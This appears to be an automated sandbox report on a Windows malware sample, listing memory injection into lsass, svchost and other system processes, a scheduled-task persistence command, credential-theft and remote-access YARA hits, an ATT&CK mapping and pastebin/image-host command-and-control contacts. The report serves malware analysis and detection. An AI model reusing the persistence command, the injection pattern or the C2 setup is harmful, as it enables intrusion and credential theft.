Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 21681980000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: unknown base: 2616D010000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3BD0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE26F0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BE3D690000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 25731DD0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\conhost.exe base: 19417AC0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FE9F0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FEA20000 value starts with: 4D5A
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: PID: 4056 base: 8700000 value: 4D
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\dwm.exe base: 262F1EA0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E120000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 18F1A9A0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\explorer.exe base: 8700000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 212DAEE0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\conhost.exe base: 1EF4F460000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E594900000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18C88430000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 18FE0970000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FDE2F60000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 2675A1B0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Users\user\Desktop\r8k29DBraE.exe base: 2616F300000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1CE10000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 21681980000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3BD0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE26F0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BE3D690000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 25731DD0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\conhost.exe base: 19417AC0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FE9F0000
Source: C:\Users\user\Desktop\wzcsvc.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FEA20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE2680000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE26C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 13DE26F0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 265B3580000
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Process created: C:\Users\user\Desktop\wzcsapi.exe "C:\Users\user\Desktop\wzcsapi.exe"
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Process created: C:\Users\user\Desktop\wzcsvc.exe "C:\Users\user\Desktop\wzcsvc.exe"
Source: C:\Users\user\Desktop\wzcsapi.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1408 -s 1088
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_00007FF6B5AD1B4C AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 4_2_00007FF6B5AD1B4C
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_00007FF6B5AD1B4C AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 4_2_00007FF6B5AD1B4C
Source: dwm.exe, 0000000E.00000002.2687636914.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000E.00000000.1380454228.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerd
Source: winlogon.exe, 00000006.00000000.1359296508.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2653092837.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2690684615.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000006.00000000.1359296508.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2653092837.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2690684615.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: winlogon.exe, 00000006.00000000.1359296508.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2653092837.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2690684615.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
Source: winlogon.exe, 00000006.00000000.1359296508.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2653092837.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2690684615.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F313C60 cpuid 1_2_000002616F313C60
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Queries volume information: C:\Users\user\Desktop\r8k29DBraE.exe VolumeInformation
Source: C:\Users\user\Desktop\wzcsapi.exe | Queries volume information: C:\Users\user\Desktop\wzcsapi.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_00007FF6B5AD1B4C AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 4_2_00007FF6B5AD1B4C
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F597970 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_000002616F597970
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.8.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: wzcsapi.exe, 00000003.00000002.2666839520.000000001B878000.00000004.00000020.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2666839520.000000001B7B0000.00000004.00000020.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2666839520.000000001B88E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000017.00000003.1476685922.000002A76AE63000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.1476275111.000002A76AE63000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1446658941.000002A76AE63000.00000004.00000001.00020000.00000000.sdmp, Amcache.hve.8.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.23.dr | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\wzcsapi.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\wzcsapi.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\wzcsapi.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\wzcsapi.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\wzcsapi.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\wzcsapi.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\wzcsapi.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\wzcsapi.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 3.2.wzcsapi.exe.28cf290.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.wzcsapi.exe.1bee0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wzcsapi.exe PID: 6880, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 3.2.wzcsapi.exe.28cf290.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.wzcsapi.exe.1bee0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wzcsapi.exe PID: 6880, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | 1 Access Token Manipulation | 1 Abuse Elevation Control Mechanism | Security Account Manager | 24 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 713 Process Injection | 2 Obfuscated Files or Information | NTDS | 351 Security Software Discovery | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Scheduled Task/Job | 22 Software Packing | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 3 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 4 Rootkit | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 111 Masquerading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 41 Virtualization/Sandbox Evasion | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Access Token Manipulation | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 713 Process Injection | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
Business Relationships | Server | Trusted Relationship | Visual Basic | Container Orchestration Job | Container Orchestration Job | 1 Hidden Files and Directories | Web Portal Capture | Local Groups | Component Object Model and Distributed COM | Local Email Collection | Internal Proxy | Commonly Used Port | Direct Network Flood
Behavior Graph (ID: 1533949, Sample: r8k29DBraE.exe, Startdate: 15/10/2024, Architecture: WINDOWS, Score: 100)

Start: contacts rentry.co, i.ibb.co; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 12 other signatures; rentry.co: Connects to a pastebin service (likely for C&C)
r8k29DBraE.exe (started): dropped C:\Users\user\Desktop\wzcsvc.exe (PE32+) and C:\Users\user\Desktop\wzcsapi.exe (PE32); Found direct / indirect Syscall (likely to bypass EDR); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent); started wzcsvc.exe, wzcsapi.exe, WerFault.exe
wzcsvc.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 8 other signatures; injected lsass.exe and svchost.exe; started svchost.exe; 26 other processes
wzcsapi.exe: i.ibb.co 169.197.85.95, 443, 49767, 49773 PUREVOLTAGE-INCUS United States; rentry.co 104.26.2.16, 443, 49731 CLOUDFLARENETUS United States; 2 other IPs or domains; Uses schtasks.exe or at.exe to add and modify task schedules; started schtasks.exe
WerFault.exe (started by r8k29DBraE.exe): dropped C:\ProgramData\Microsoft\...\Report.wer (Unicode)
lsass.exe (injected by wzcsvc.exe): Creates files in the system32 config directory; Writes to foreign memory regions; started svchost.exe; injected svchost.exe
svchost.exe (started by wzcsvc.exe): System process connects to network (likely due to code injection or exploit); started WerFault.exe
